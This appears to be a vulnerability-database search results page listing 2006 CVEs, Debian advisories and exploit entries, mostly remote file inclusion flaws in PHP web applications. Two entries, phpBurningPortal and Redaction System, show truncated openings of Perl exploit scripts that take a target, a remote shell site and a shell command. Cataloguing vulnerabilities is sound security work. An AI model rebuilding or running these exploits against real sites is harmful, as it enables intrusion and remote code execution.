9472 matches found
CVE-2006-5443
Unspecified vulnerability in XIAO Gang WWW Interactive Mathematics Server WIMS before 3.60 allows remote attackers to modify unspecified data via unspecified vectors involving "variable rights."...
DEBIAN-CVE-2006-5443
Unspecified vulnerability in XIAO Gang WWW Interactive Mathematics Server WIMS before 3.60 allows remote attackers to modify unspecified data via unspecified vectors involving "variable rights."...
Serendipity -- XSS Vulnerabilities
The Serendipity Team reports: Serendipity failed to correctly sanitize user input on the media manager administration page. The content of GET variables was written into JavaScript strings. By using standard string evasion techniques it was possible to execute arbitrary JavaScript. Additionally...
[ECHO_ADV_46$2006] P-Book <= 1.17 (pb_lang) Remote File Inclusion
ECHOADV56$2006 - ECHOADV46$2006 P-Book <= 1.17 (pb_lang) Remote File Inclusion - Author: Ahmad Maulana a.k.a Matdhule. Date Found: October, 18th...
Segue CMS <= 1.5.8 (themesdir) Remote File Include Vulnerability
No description provided by source. Segue CMS <= 1.5.8 (themesdir) Remote File Include Vulnerability. Affected...
CVE-2006-5327
Untrusted search path vulnerability in OpenBase SQL 10.0 and earlier, as used in Apple Xcode 2.2 and earlier and possibly other products, allows local users to execute arbitrary code via a modified PATH that references a malicious gzip program, which is executed by gnutar with certain...
PHPmybibli 3.0.1 - Multiple Remote File Inclusions
ECHOADV55$2006: Phpmybibli <=2.1 Multiple Remote File Inclusion Vulnerability...
PHPmybibli <= 3.0.1 Multiple Remote File Inclusion Vulnerabilities
No description provided by source. ECHOADV55$2006: Phpmybibli <=2.1 Multiple Remote File Inclusion...
Osprey <= 1.0 GetRecord.php Remote File Include Vulnerability
Exploit for unknown platform in category web applications. Osprey <= 1.0 GetRecord.php Remote File Include Vulnerability...
CampSite 2.6.1 - g_documentRoot Remote File Inclusion
CampSite 2.6.1 - g_documentRoot Remote File Inclusion. CampSite - BugReporter = 2.6.1 Remote File Include Vulnerability. Discovered By Kw3RLn Romani...
phpBurningPortal 1.0.1 - 'lang_path' Remote File Inclusion
!/usr/bin/perl use LWP::UserAgent; use LWP::Simple; $target = @ARGV0; $shellsite = @ARGV1; $shellcmd = @ARGV2; $fileno = @ARGV3; if!$target || !$shellsite usage; header; if $fileno eq 1 $file = "questdelete.php?langpath="; elsif $fileno eq 2 $file = "questedit.php?langpath="; elsif $fileno eq 3...
Debian DSA-1075-1 : awstats - programming error
Hendrik Weimer discovered that awstats can execute arbitrary commands under the user id the web-server runs when users are allowed to supply arbitrary configuration files. Even though this bug was referenced in DSA 1058 accidentally, it was not fixed yet. The new default behaviour is not to acce...
Debian DSA-1154-1 : squirrelmail - variable overwriting
James Bercegay of GulfTech Security Research discovered a vulnerability in SquirrelMail where an authenticated user could overwrite random variables in the compose script. This might be exploited to read or write the preferences or attachment files of other users.
Debian DSA-1096-1 : webcalendar - uninitialised variable
A vulnerability has been discovered in webcalendar, a PHP-based multi-user calendar, that allows a remote attacker to execute arbitrary PHP code when register_globals is turned on.
Redaction System 1.0 - lang_prefix Remote File Inclusion
Redaction System 1.0 - langprefix Remote File Inclusion !/usr/bin/perl use LWP::UserAgent; $target = @ARGV0; $shellsite = @ARGV1; $shellcmd = @ARGV2; $fileno = @ARGV3; if!$target || !$shellsite usage; header; if $fileno eq 1 $file = " conn.php?langprefix="; elsif $fileno eq 2 $file =...
Sun Solaris NSPR library privilege escalation
Environment variable is used for log filename...
Echo Security Advisory 2006.49
ECHOADV49$2006: OpenDock Easy Doc =1.4 docdirectory Multiple Remote File Inclusion Vulnerability...